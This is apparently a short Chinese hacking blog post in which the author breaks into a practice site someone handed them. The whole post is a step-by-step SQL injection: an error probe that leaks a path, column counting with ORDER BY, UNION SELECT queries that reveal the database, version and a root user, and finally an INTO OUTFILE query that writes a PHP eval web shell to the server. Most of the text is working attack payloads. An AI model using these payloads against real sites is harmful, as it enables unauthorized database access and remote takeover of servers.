一个乐于助人的大牛给了我一个站让我练手
说走咱就走啊,一言不合就开车啊对不对
and 1=2直接报错出了路径,这回我打码了,毕竟站是别人给的
然后order by 26返回正常
order by 27返回错误
于是我们
http://xxxx.com/article.php?wid=xxxx UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
没报错
然后在wid=这里加一个-
报错爆出 7 和10
然后开始查询user()
和database()
这时候我看到了了不得的东西
UNION SELECT 1,2,3,4,5,6,database(),version(),9,user(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
root!!!
然后就Happy了
直接UNION SELECT 1,2,3,4,5,6,'<?php eval($_POST[a])?>',version(),9,user(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 into outfile 'D:\\xxxxx\\xx.php'
成功getsehll